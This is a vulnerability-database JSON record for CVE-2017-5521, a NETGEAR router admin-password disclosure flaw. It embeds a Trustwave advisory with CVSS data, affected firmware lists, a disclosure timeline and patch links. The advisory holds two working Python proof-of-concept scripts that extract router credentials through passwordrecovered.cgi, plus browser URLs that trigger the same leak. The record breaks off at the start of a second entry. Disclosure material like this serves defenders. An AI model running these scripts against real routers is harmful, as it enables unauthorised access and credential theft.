"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2017-5521",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-5521",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5521",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2017-5521",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-5521",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-00835",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201701-454",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-113724",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-5521",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear\u0027s wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. \nSuccessful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003:\nMultiple Vulnerabilities in NETGEAR Routers\n \nPublished: 01/30/2017\nVersion: 1.0\n \nVendor: NETGEAR (http://www.netgear.com/)\nProduct: Multiple products\n \nFinding 1: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\n# D6400 V1.0.0.34_1.3.34\n# D6400 V1.0.0.38_1.1.38\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\n# R6300 V1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.30_10.0.73\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.26_1.0.41\n# R8500 V1.0.0.56_1.0.28\n# R8500 V1.0.0.20_1.0.11\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.29_1.0.29\n# VEGN2610 V1.0.0.27_1.0.27\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.42_1.0.25\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\n# WN3100RP V1.0.0.6_1.0.12\n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n \n \nProduct description:\nMultiple Netgear Routers\n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. \nThis can easily be reproduced using the attached poc, or by sending these two \nsimple requests via the browser:\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\n \n## netgore.py\nimport sys\nimport requests\n \n \ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage - get token\nip = sys.argv[1]\nport = sys.argv[2]\nurl = \u0027http://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\ntry:\n r = requests.get(url)\nexcept:\n url = \u0027https://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\n r = requests.get(url, verify=False)\nmodel = r.headers.get(\u0027WWW-Authenticate\u0027)\nif model is not None:\n print \"Attcking: \" + model[13:-1]\nelse:\n print \"not a netgear router\"\n sys.exit(0)\ntoken = scrape(r.text, \u0027unauth.cgi?id=\u0027, \u0027\\\"\u0027)\nif token == \u0027i_dont_speak_english\u0027:\n print \"not vulnerable\"\n sys.exit(0)\nprint \"token found: \" + token\n#2nd stage - pass the token - get the password\nurl = url + \u0027passwordrecovered.cgi?id=\u0027 + token\nr = requests.post(url, verify=False)\n#profit\nif r.text.find(\u0027left\\\"\u003e\u0027) != -1:\n username = (repr(scrape(r.text, \u0027Router Admin Username\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n username = scrape(username, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n password = (repr(scrape(r.text, \u0027Router Admin Password\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n password = scrape(password, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n if username == \"i_dont_speak_english\":\n username = (scrape(r.text[r.text.find(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\n password = (scrape(r.text[r.text.rfind(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\nelse:\n print \"not vulnerable becuse password recovery IS set\"\n sys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"\u0026#35;\",\"#\")\npassword = password.replace(\"\u0026\",\"\u0026\")\nprint \"user: \" + username\nprint \"pass: \" + password\n \n================================\nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \nFinding 2: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6300 V1.0.0.96_1.1.96 (Latest)\n# D6300B V1.0.0.36_1.0.36\n# D6300B V1.0.0.32_1.0.32\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\n# DGN2200v4 V1.0.0.66_1.0.66\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.56_1.0.43 (Latest)\n# R6200 V1.0.1.52_1.0.41\n# R6200 V1.0.1.48_1.0.37\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\n# R6200v2 V1.0.1.20_1.0.18\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\n# R6250 V1.0.1.84_1.0.78 \n# R6300 V1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\n# R6700 V1.0.0.26_10.0.26 (Latest)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R7000 V1.0.4.30_1.1.67\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\n# R7900 V1.0.0.10_10.0.7\n# R7900 V1.0.0.8_10.0.5\n# R7900 V1.0.0.6_10.0.4\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.30_1.0.43\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.27_1.0.27\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\n# VEVG2660 V1.0.0.23_1.0.23\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\n# WNDR3400v3 V1.0.1.2_1.0.51\n# WNDR3400v3 V1.0.0.22_1.0.29\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.50_1.0.30\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\n# WNR3500Lv2 V1.2.0.32_40.0.74\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. \n \nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \nany TOKEN value will result in disclosure of the password. \nThe issue occurs after every reboot of the router. \n \nThis can easily be reproduced using the attached poc, or by sending a simple \nrequest via the browser:\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\n \n## netgore2.py\nimport sys\nimport requests\n \ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage\nip = sys.argv[1]\nport = sys.argv[2]\nurl = \u0027http://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\ntry:\n r = requests.get(url)\nexcept:\n url = \u0027https://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\n r = requests.get(url, verify=False)\nmodel = r.headers.get(\u0027WWW-Authenticate\u0027)\nif model is not None:\n print \"Attcking: \" + model[13:-1]\nelse:\n print \"not a netgear router\"\n sys.exit(0)\n#2nd stage\nurl = url + \u0027passwordrecovered.cgi?id=get_rekt\u0027\ntry:\n r = requests.post(url, verify=False)\nexcept:\n print \"not vulnerable router\"\n sys.exit(0)\n#profit\nif r.text.find(\u0027left\\\"\u003e\u0027) != -1:\n username = (repr(scrape(r.text, \u0027Router Admin Username\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n username = scrape(username, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n password = (repr(scrape(r.text, \u0027Router Admin Password\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n password = scrape(password, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n if username == \"i_dont_speak_english\":\n username = (scrape(r.text[r.text.find(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\n password = (scrape(r.text[r.text.rfind(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\nelse:\n print \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\n sys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"\u0026#35;\",\"#\")\npassword = password.replace(\"\u0026\",\"\u0026\")\nprint \"user: \" + username\nprint \"pass: \" + password\n \n================================\nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \n \nRemediation Steps:\nPlease see NETGEAR\u0027s KBA for list of firmware patches for various models. \n \nRevision History:\n04/06/2016 - Vulnerability disclosed to vendor\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\n05/18/2016 - Request for update; no response\n07/14/2016 - Request for update\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\n10/17/2016 - Request for update\n12/15/2016 - Notice of intent to publish advisories\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\n01/30/2017 - Advisory published\n \n \nReferences\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\n2. https://www.exploit-db.com/exploits/32883/\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n \n \nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n \nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n \nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5521"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "PACKETSTORM",
"id": "140844"
}
],
"trust": 2.7
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-113724",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41205",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2017-5521",
"trust": 4.4
},
{
"db": "BID",
"id": "95457",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "41205",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-00835",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "140844",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-92639",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-113724",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-5521",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "32883",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "PACKETSTORM",
"id": "140844"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"id": "VAR-201701-0766",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
}
],
"trust": 1.2144185085714285
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
}
]
},
"last_update_date": "2025-11-18T15:06:53.063000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Web\u00a0GUI\u00a0Password\u00a0Recovery\u00a0and\u00a0Exposure\u00a0Security\u00a0Vulnerability",
"trust": 0.8,
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability?cid=wmt_netgear_organic"
},
{
"title": "Patches for administrator password information disclosure vulnerabilities in various NETGEAR routers",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/88524"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=67049"
},
{
"title": "kenzer-templates",
"trust": 0.1,
"url": "https://github.com/Elsfa7-110/kenzer-templates "
},
{
"title": "kenzer-templates",
"trust": 0.1,
"url": "https://github.com/ARPSyndicate/kenzer-templates "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/new-mirai-variant-carries-out-54-hour-ddos-attacks/124660/"
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2017/01/31/major_security_hole_in_netgear_routers/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/hardware/31-netgear-router-models-affected-by-flaw-that-exposes-admin-password/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-200",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.8,
"url": "http://kb.netgear.com/30632/web-gui-password-recovery-and-exposure-security-vulnerability"
},
{
"trust": 2.0,
"url": "http://www.securityfocus.com/bid/95457"
},
{
"trust": 1.4,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5521"
},
{
"trust": 1.3,
"url": "https://www.exploit-db.com/exploits/41205/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2017-5521"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/95457/"
},
{
"trust": 0.3,
"url": "http://www.netgear.com"
},
{
"trust": 0.2,
"url": "https://\u0027"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/gather/netgear_password_disclosure"
},
{
"trust": 0.1,
"url": "http://router/passwordrecovered.cgi?id=trustwave_spiderlabs"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "http://router/.../"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5521"
},
{
"trust": 0.1,
"url": "http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/32883/"
},
{
"trust": 0.1,
"url": "http://router/..../unauth.cgi?id=token"
},
{
"trust": 0.1,
"url": "http://router/passwordrecovered.cgi?id=token"
},
{
"trust": 0.1,
"url": "http://www.netgear.com/)"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "VULHUB",
"id": "VHN-113724"
},
{
"db": "VULMON",
"id": "CVE-2017-5521"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "PACKETSTORM",
"id": "140844"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-00835",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-113724",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2017-5521",
"ident": null
},
{
"db": "BID",
"id": "95457",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "140844",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2017-5521",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2017-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-00835",
"ident": null
},
{
"date": "2017-01-17T00:00:00",
"db": "VULHUB",
"id": "VHN-113724",
"ident": null
},
{
"date": "2017-01-17T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5521",
"ident": null
},
{
"date": "2017-01-16T00:00:00",
"db": "BID",
"id": "95457",
"ident": null
},
{
"date": "2017-01-31T17:02:22",
"db": "PACKETSTORM",
"id": "140844",
"ident": null
},
{
"date": "2017-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201701-454",
"ident": null
},
{
"date": "2017-02-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"ident": null
},
{
"date": "2017-01-17T09:59:00.333000",
"db": "NVD",
"id": "CVE-2017-5521",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2017-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-00835",
"ident": null
},
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-113724",
"ident": null
},
{
"date": "2017-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5521",
"ident": null
},
{
"date": "2017-01-23T03:09:00",
"db": "BID",
"id": "95457",
"ident": null
},
{
"date": "2017-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201701-454",
"ident": null
},
{
"date": "2024-07-01T06:31:00",
"db": "JVNDB",
"id": "JVNDB-2017-001263",
"ident": null
},
{
"date": "2025-10-22T00:16:06.633000",
"db": "NVD",
"id": "CVE-2017-5521",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "plural \u00a0NETGEAR\u00a0 Password disclosure vulnerability in device products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
}
],
"trust": 0.6
}
}
VAR-202110-1807
Vulnerability from variot - Updated: 2025-08-20 23:06NETGEAR Multiple Routers httpd Missing Authentication for Critical Function Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of multiple NETGEAR routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of authentication prior to allowing access to system configuration information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-13708
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1807",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.132"
},
{
"model": "rax35v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r7960p",
"scope": "lt",
